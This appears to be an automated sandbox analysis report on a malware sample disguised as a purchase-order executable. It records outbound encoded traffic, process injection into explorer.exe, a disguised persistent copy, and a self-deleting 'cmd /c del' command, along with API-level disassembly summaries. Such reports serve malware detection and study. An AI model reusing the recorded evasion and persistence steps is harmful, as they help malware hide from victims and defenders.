May 6, 2019 21:25:59.404845953 CEST	49	OUT	Data Raw: 71 71 4a 6e 59 6a 62 42 6c 39 52 46 69 56 6e 4f 39 38 63 34 7e 46 45 35 4d 63 76 74 69 48 42 73 58 77 59 46 56 30 76 30 37 7a 38 47 75 4c 37 52 32 79 69 31 69 6b 47 59 73 65 64 56 49 59 45 65 73 4e 7e 47 48 45 65 4f 51 64 37 6e 4b 6b 64 36 32 51 Data Ascii: qqJnYjbBl9RFiVnO98c4~FE5McvtiHBsXwYFV0v07z8GuL7R2yi1ikGYsedVIYEesN~GHEeOQd7nKkd62Q9jvolSwFvnTCHb8IHY4la4xau7ccKraljFXD4nKdcNERo7LBRY1-Eb0WfHbz~Ig2ZY6UptBSc29fjonpz4ss07R8guyQhwag8Puf~xNN8WD1~_NYUAxJImh46BYED4eu9-Q7fUc-RJokoU5oKTYvOf3We_CD(ZjLM
May 6, 2019 21:25:59.404988050 CEST	61	OUT	Data Raw: 52 2d 4c 6d 36 56 31 70 34 38 63 65 6a 52 4b 47 6a 75 50 52 6a 77 67 7a 28 6d 34 54 42 58 6e 51 70 61 52 5f 7e 37 53 32 4c 53 74 6b 42 4b 31 5a 69 54 7a 44 7a 59 78 35 69 44 55 48 66 42 6c 4b 37 64 70 63 43 6a 7a 32 6c 39 43 63 62 68 61 76 4a 79 Data Ascii: R-Lm6V1p48cejRKGjuPRjwgz(m4TBXnQpaR_~7S2LStkBK1ZiTzDzYx5iDUHfBlK7dpcCjz2l9CcbhavJy4yUfzjDIwPJ68bQJm5qErDOuVacFbnatj3x-HTjj~8CSl-iJALznHXgiMpuHufaEHSIuGgvkh4lMMZlUilXPq0GGm6dSgFKE(k(MYmCOH0Lv0EkJQIG0VMmPP7hJ8w3vF1OwUCYSKPEs(pi1vpAgGqAioaU5ibUCs
May 6, 2019 21:25:59.405288935 CEST	66	OUT	Data Raw: 4c 52 43 4a 44 6c 63 5f 38 2d 78 35 68 65 6d 68 4c 77 41 43 4c 4e 4d 64 35 73 6e 54 37 47 65 61 51 65 6f 69 73 71 50 6b 79 44 77 71 4c 72 6c 62 70 62 33 47 30 36 71 4f 42 5a 63 57 78 47 7a 72 4c 4e 6b 6d 33 7a 6d 48 34 49 52 77 72 7a 67 38 68 69 Data Ascii: LRCJDlc_8-x5hemhLwACLNMd5snT7GeaQeoisqPkyDwqLrlbpb3G06qOBZcWxGzrLNkm3zmH4IRwrzg8hiD_BZpLcy9fALpHS8M0h4MazI~8ytV-yL9ML5LaPQzSc8xVPhVKZ1JFUrMcH4h2LX0lcXir3vi213qOgt2VULpAVAqJL_8HIpsaph0CAwskx_oW4V45LPbmtl9r22VI1RyF1AOYJ1tuAipRRi02FTx3g8GC3uhKYLE
May 6, 2019 21:25:59.461714983 CEST	73	OUT	Data Raw: 65 47 73 65 52 78 49 53 42 42 4f 4b 51 75 56 69 45 4e 42 47 48 77 43 58 47 6e 73 50 4c 36 68 76 6e 47 34 4f 4c 4a 4b 64 57 64 6c 74 59 33 66 34 44 62 64 53 55 63 35 42 35 75 44 78 37 38 59 67 34 77 51 6a 66 41 4f 64 52 49 77 77 31 4d 67 33 52 6e Data Ascii: eGseRxISBBOKQuViENBGHwCXGnsPL6hvnG4OLJKdWdltY3f4DbdSUc5B5uDx78Yg4wQjfAOdRIww1Mg3RngN39HLPMheN1470YWVi866gq7i8lwWpZCdVx9KGY92FNIF8NE_BtAka5odHVOtkR(Mj4uXMLhRim2rRWA1s82vzX6jvGeskS~5yLuAwcq7M6tFmuUAOgnQgZT1G9FjIswIOgWRIPZXlEAAYLiegiS9htQUfshyhrA
May 6, 2019 21:25:59.461941957 CEST	75	OUT	Data Raw: 66 67 39 46 79 6d 69 39 76 54 4d 2d 73 54 37 75 30 38 70 50 55 6a 79 71 45 36 50 77 57 5f 4f 71 69 63 45 65 62 37 59 56 6b 72 51 71 33 33 6c 65 63 67 71 6c 4f 4d 61 6e 56 67 50 6f 44 31 68 54 55 5f 4c 34 58 65 79 59 61 62 65 43 66 37 6a 4a 38 47 Data Ascii: fg9Fymi9vTM-sT7u08pPUjyqE6PwW_OqicEeb7YVkrQq33lecgqlOManVgPoD1hTU_L4XeyYabeCf7jJ8GcV3HmPmd~tqC17lov7gDxusvX4YZZjxWa20i3VxiGWfSoPzKpmvky4vksNfgBhV-jxL4Fk18~qQFtMT7kVSHHYM698BMAFe5H-SZFLBruTjHCJNx0ptuIROyTuxN7NZOq2PxTydyuH1Ff4X_9FQwwvFFoccfGX7LL
May 6, 2019 21:25:59.461999893 CEST	80	OUT	Data Raw: 4f 7a 52 67 4f 32 37 34 46 4e 77 77 39 31 4d 4e 7e 53 56 30 64 56 35 53 39 78 54 53 49 62 73 7a 76 4c 47 44 33 63 54 6a 30 58 54 38 79 4d 63 2d 58 59 4c 38 6d 45 58 78 6c 45 74 62 7e 31 70 4c 7e 59 28 6c 31 47 35 4a 77 66 4f 55 7a 75 63 66 67 79 Data Ascii: OzRgO274FNww91MN~SV0dV5S9xTSIbszvLGD3cTj0XT8yMc-XYL8mEXxlEtb~1pL~Y(l1G5JwfOUzucfgyrWQBJ4Q7ABmeTHrl(2il24yCSRmwb-r_qHyeJB6X3xgXjZdOr7k0YrcjsgW5GdVm1oO2blipEGWK6Yhofs7ppPpXy8K2rUQMv_XkOtqGZlM-vmDJt8BDg9LrZ0qyihIvdOIuKb5mlPzsGbONqR(9bvmvsxfdG0vL0
May 6, 2019 21:25:59.462106943 CEST	97	OUT	Data Raw: 47 54 52 76 59 75 58 66 65 4f 35 52 42 30 44 5f 63 51 4a 4c 49 5a 54 72 69 32 39 44 78 6c 6b 39 6d 74 4c 53 30 6e 7a 6f 62 68 6b 52 50 4e 4b 58 4a 58 54 6a 4c 53 65 6d 70 63 46 42 56 41 33 76 35 37 31 67 77 62 53 49 28 5f 69 71 28 68 55 61 31 37 Data Ascii: GTRvYuXfeO5RB0D_cQJLIZTri29Dxlk9mtLS0nzobhkRPNKXJXTjLSempcFBVA3v571gwbSI(_iq(hUa17IBYclJh0oJaxkczqvXke1PqlXRheTHMbEbUvoS6DRYmCVInIG6k_ac6GmP92Ci9cqK(5hTgYnLoumwvOkOdjWaBP~sVu4cIkNg~_G4bVATtYQ7N-rDaBZcA-UjE-S5ldTyh_3UtmsxsrOZRW84BTbJqeyxca04QbK
May 6, 2019 21:25:59.462923050 CEST	99	OUT	Data Raw: 4b 75 4a 77 56 5f 30 75 37 32 76 76 32 58 59 53 31 32 68 43 30 4b 64 72 50 4b 78 59 62 55 57 37 53 74 74 4c 61 36 55 55 54 65 6f 54 56 7a 75 2d 72 57 54 49 36 73 41 4a 6f 2d 42 5f 6c 64 79 37 63 79 69 55 68 42 58 43 71 4b 4e 73 57 2d 74 66 34 52 Data Ascii: KuJwV_0u72vv2XYS12hC0KdrPKxYbUW7SttLa6UUTeoTVzu-rWTI6sAJo-B_ldy7cyiUhBXCqKNsW-tf4RnAd8G-vEYjjK(pnwhckbogv3DtRoHj7Tq-OK7a(AmZRspXMSb_HptUpRg6sSYq1Lvyqy8HutxfOZ2cVduyEopETRWojjOw~9e4bvvEM7Lh5BVgwzNArRd1G6aebMkvkjIioT7hjAoFz5fmahPlvohFfvLoJ6iGIgm

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: PO201905.exe PID: 3340 Parent PID: 2924

General

Start time:	21:16:44
Start date:	06/05/2019
Path:	C:\Users\user\Desktop\PO201905.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\PO201905.exe'
Imagebase:	0xfb0000
File size:	885760 bytes
MD5 hash:	27CF7E2BE6E049B2793AD9F38218EB01
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Embedded_PE, Description: unknown, Source: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000000.00000002.4518783364.00FBA000.00000040.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000000.00000002.4518101641.00200000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000000.00000000.3459785508.00FB0000.00000002.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000000.00000002.4518759786.00FB0000.00000002.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000000.00000003.4480049922.00B60000.00000004.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000000.00000002.4518066485.000F0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000000.00000001.3460208049.00FB0000.00000002.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000000.00000003.4508449289.00256000.00000004.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000000.00000002.4518214232.0025C000.00000004.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000000.00000002.4518110322.00210000.00000040.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000000.00000003.4481262828.00CA0000.00000004.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000000.00000002.4520262603.026A1000.00000040.sdmp, Author: unknown
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 1880 Parent PID: 3340

General

Start time:	21:24:00
Start date:	06/05/2019
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0xa40000
File size:	2616320 bytes
MD5 hash:	8B88EBBB05A0E56B7DCC708498C02B3E
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4489812531.05280000.00000002.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4489859117.053A0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4499027121.02FD0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4499136614.03160000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4483829349.021F0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4489594683.04FD0000.00000002.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4483813760.021E0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4481973939.000D0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4483543065.01C90000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4489196294.04B80000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4482978785.00960000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4485301200.02FD0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4485257832.02F00000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4483012656.009B0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4496745744.01F30000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4496645451.01C90000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4485383734.03160000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4485420844.03230000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4495827412.00730000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4489866128.053E0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4496873251.020D0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4489753137.051E0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4489219800.04C00000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4498956019.02F00000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4495226765.000D0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4483619954.01F30000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4498910122.02E40000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4489600354.04FE0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4498921613.02E50000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4489914928.05460000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4482006795.00120000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4496065227.00960000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4489653245.050E0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4482163480.00340000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4499198783.03230000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4495408457.00340000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4485235319.02E50000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4495818939.00720000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4483709645.020D0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4482523631.00720000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4499267957.03330000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4496687348.01D70000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4485229761.02E40000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4485325684.03030000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4496894367.020E0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4499078335.03090000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4497202502.021F0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4495256653.00120000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4496097002.009B0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4483572029.01D70000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4499056992.03030000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4485467608.03330000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4482532068.00730000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4485342639.03090000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4489179656.04B70000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4497183880.021E0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4489291554.04D40000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4483716872.020E0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4482412222.00680000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4495735054.00680000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4499297653.033B0000.00000002.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4492371223.086E0000.00000002.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000006.00000000.4485576438.033B0000.00000002.sdmp, Author: unknown
Reputation:	moderate

Chronological Activities

Analysis Process: autoconv.exe PID: 1868 Parent PID: 1880

General

Start time:	21:24:08
Start date:	06/05/2019
Path:	C:\Windows\System32\autoconv.exe
Wow64 process (32bit):	false
Commandline:	unknown
Imagebase:	0x740000
File size:	679424 bytes
MD5 hash:	09D786401F6CA6AEB16B2811B169F944
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: ipconfig.exe PID: 2692 Parent PID: 1880

General

Start time:	21:24:08
Start date:	06/05/2019
Path:	C:\Windows\System32\ipconfig.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\ipconfig.exe
Imagebase:	0xff0000
File size:	27136 bytes
MD5 hash:	CABB20E171770FF64614A54C1F31C033
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 3912 Parent PID: 2692

General

Start time:	21:24:12
Start date:	06/05/2019
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c del 'C:\Users\user\Desktop\PO201905.exe'
Imagebase:	0x49ef0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: firefox.exe PID: 3928 Parent PID: 2692

General

Start time:	21:24:49
Start date:	06/05/2019
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Mozilla Firefox\Firefox.exe
Imagebase:	0x8a0000
File size:	393672 bytes
MD5 hash:	028A018B533F955992C416E098A2A32C
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: 9rxlgd1bcduf.exe PID: 424 Parent PID: 1880

General

Start time:	21:24:53
Start date:	06/05/2019
Path:	C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe
Imagebase:	0x1060000
File size:	885760 bytes
MD5 hash:	27CF7E2BE6E049B2793AD9F38218EB01
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Embedded_PE, Description: unknown, Source: 0000000C.00000000.4605949292.01060000.00000002.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 0000000C.00000001.4606191992.01060000.00000002.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 0000000C.00000002.4699103178.000E0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 0000000C.00000002.4700605804.000F0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe, Author: unknown Rule: Embedded_PE, Description: unknown, Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML, Browse Detection: 100%, Joe Sandbox ML, Browse Detection: 16%, virustotal, Browse
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: PO201905.exe PID: 3340 Parent PID: 2924 PO201905.exeUNIQUE

Executed Functions

Function 00FB10C0, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 89windowregistryUNIQUE

Download Yara Rule

APIs

__time64.LIBCMT ref: 00FB10CB

Part of subcall function 00FB194C: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,00FB10D0,00000000), ref: 00FB1957
Part of subcall function 00FB194C: __aulldiv.LIBCMT ref: 00FB1977

Part of subcall function 00FB1764: __getptd.LIBCMT ref: 00FB1769

LoadIconW.USER32(?,HexCalc), ref: 00FB10FD
LoadCursorW.USER32(00000000,00007F00), ref: 00FB110C
RegisterClassW.USER32(00000003), ref: 00FB112A
MessageBoxW.USER32(00000000,Program requires Windows NT!,HexCalc,00000010), ref: 00FB1142
CreateDialogParamW.USER32(?,HexCalc,00000000,00000000,00000000), ref: 00FB1161
ShowWindow.USER32(00000000,?), ref: 00FB1171
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FB1184
TranslateMessage.USER32(?), ref: 00FB119B
DispatchMessageW.USER32(?), ref: 00FB11A1
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FB11AD

Strings

HexCalc, xrefs: 00FB10DC, 00FB1123, 00FB1137, 00FB1155
Program requires Windows NT!, xrefs: 00FB113C

Memory Dump Source

Source File: 00000000.00000002.4518765881.00FB1000.00000020.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518783364.00FBA000.00000040.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID: Message$LoadTime$ClassCreateCursorDialogDispatchFileIconParamRegisterShowSystemTranslateWindow__aulldiv__getptd__time64
String ID: HexCalc$Program requires Windows NT!
API String ID: 1340511868-3919904463
Opcode ID: 56e737b22a415cbba0f35e842b77778f1b8a2c79ed7871e28ba43a520bac4566
Instruction ID: 9b1db2e4ed06166d144cad59f8a110fbccae46586ac3a6da99d973ef9a01db6d
Opcode Fuzzy Hash: 56e737b22a415cbba0f35e842b77778f1b8a2c79ed7871e28ba43a520bac4566
Instruction Fuzzy Hash: 0B211A71D04309AACB10AFAAEC89EDFBBBCBB89B10F00411AF941A6241D7B45405DFB4

Uniqueness

Uniqueness Score: 100.00%

Function 00FB16AB, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100UNIQUE

Download Yara Rule

APIs

Part of subcall function 00FB228D: DecodePointer.KERNEL32(?,00FB5D33,00000008,00000000,?,00FB4BDB,00FB10B4,00000008,00000000,00000000,00000000,?,00FB2422,00000001,00000214), ref: 00FB2298

_malloc.LIBCMT ref: 00FB1BA6

Part of subcall function 00FB16C5: __FF_MSGBANNER.LIBCMT ref: 00FB16DE
Part of subcall function 00FB16C5: __NMSG_WRITE.LIBCMT ref: 00FB16E5
Part of subcall function 00FB16C5: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00FB4B91,00FB10B4,00000001,00FB10B4,?,00FB416D,00000018,00FB93F0,0000000C,00FB41FD), ref: 00FB170A

std::exception::exception.LIBCMT ref: 00FB1BDB
std::exception::exception.LIBCMT ref: 00FB1BF5

Part of subcall function 00FB3E84: std::exception::operator=.LIBCMT ref: 00FB3E9D

__CxxThrowException@8.LIBCMT ref: 00FB1C06

Part of subcall function 00FB4014: RaiseException.KERNEL32(?,?,00FB1C0B,00FB1580,?,?,?,?,00FB1C0B,00FB1580,00FB92AC,0107F7B0,00FB1580), ref: 00FB4056

IsDebuggerPresent.KERNEL32 ref: 00FB1CC7
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FB1CDC
UnhandledExceptionFilter.KERNEL32(00FB71B8), ref: 00FB1CE7
GetCurrentProcess.KERNEL32(C0000409), ref: 00FB1D03
TerminateProcess.KERNEL32(00000000), ref: 00FB1D0A

Strings

bad allocation, xrefs: 00FB1BD4

Memory Dump Source

Source File: 00000000.00000002.4518765881.00FB1000.00000020.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518783364.00FBA000.00000040.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID: Exception$FilterProcessUnhandledstd::exception::exception$AllocateCurrentDebuggerDecodeException@8HeapPointerPresentRaiseTerminateThrow_mallocstd::exception::operator=
String ID: bad allocation
API String ID: 1593154362-2104205924
Opcode ID: e90ee6934fe62e35d396607473f5edc0cac564ed04473fefeb620b0e1c424205
Instruction ID: 2088c1adc3ae00abb337876645512308ce8000d10f0b12ae6eafb07f8593236c
Opcode Fuzzy Hash: e90ee6934fe62e35d396607473f5edc0cac564ed04473fefeb620b0e1c424205
Instruction Fuzzy Hash: FE41CEB5D0431ADFD760EF2AF845A887BF4FB48340F00411AE4A4E3295E7BA9941DF61

Uniqueness

Uniqueness Score: 100.00%

Function 00FD16C2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00FCCB5F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00FCCB5F,007A002E,00000000,00000060,00000000,00000000), ref: 00FD1715

Strings

.z`, xrefs: 00FD1705, 00FD1710

Memory Dump Source

Source File: 00000000.00000002.4518783364.00FBA000.00000040.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518765881.00FB1000.00000020.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 04935d16cbfe0c1cd480c234c12871a52d9cba14addb61777be1dd81254b5c6f
Instruction ID: 670344c09bbc9b28e93886e40c090c6939bd270c6fb85a9f35d6002396d7e717
Opcode Fuzzy Hash: 04935d16cbfe0c1cd480c234c12871a52d9cba14addb61777be1dd81254b5c6f
Instruction Fuzzy Hash: B401F2B2210208ABDB48CF88DC85EEB37A9AF8C700F018248FE1D97241D630E951CBA0

Uniqueness

Uniqueness Score: 1.07%

Function 00FD16C8, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00FCCB5F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00FCCB5F,007A002E,00000000,00000060,00000000,00000000), ref: 00FD1715

Strings

.z`, xrefs: 00FD1705, 00FD1710

Memory Dump Source

Source File: 00000000.00000002.4518783364.00FBA000.00000040.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518765881.00FB1000.00000020.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 520cb22e2846deceaaa109a902ceddade28a984ec87f6bd332bc63003d15b575
Instruction ID: 906cae49bbc9c9cba1d3cec41ddd6e134c9bfb6c4c81339f5b529c0a8b6e406f
Opcode Fuzzy Hash: 520cb22e2846deceaaa109a902ceddade28a984ec87f6bd332bc63003d15b575
Instruction Fuzzy Hash: D8F0C4B2210208AFCB48DF88DC85EEB77EDAF8C754F058248BA0D97241C630F851CBA4

Uniqueness

Uniqueness Score: 1.07%

Function 00FD171A, Relevance: 1.6, APIs: 1, Instructions: 72filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00FCCD1A,5EAE521D,FFFFFFFF,00FCC9D9,?,?,00FCCD1A,?,00FCC9D9,FFFFFFFF,5EAE521D,00FCCD1A,?,00000000), ref: 00FD17BD

Memory Dump Source

Source File: 00000000.00000002.4518783364.00FBA000.00000040.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518765881.00FB1000.00000020.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: aec0daa60f432c5ef6671f2c2cbdd08e56b9234b90e0e2be8d295d567964d4be
Instruction ID: 634798b27cd248f913384fb8c542f4df0d10a028b8b2e255361c51882b44b02b
Opcode Fuzzy Hash: aec0daa60f432c5ef6671f2c2cbdd08e56b9234b90e0e2be8d295d567964d4be
Instruction Fuzzy Hash: 3421D6B2200108AFDB14DF99DC84EEB77AEEF8C354F158249FA1DA7251C630E811CBA0

Uniqueness

Uniqueness Score: 0.01%

Function 00FD18A2, Relevance: 1.5, APIs: 1, Instructions: 36memorynativeCOMMON

Download Yara Rule

APIs

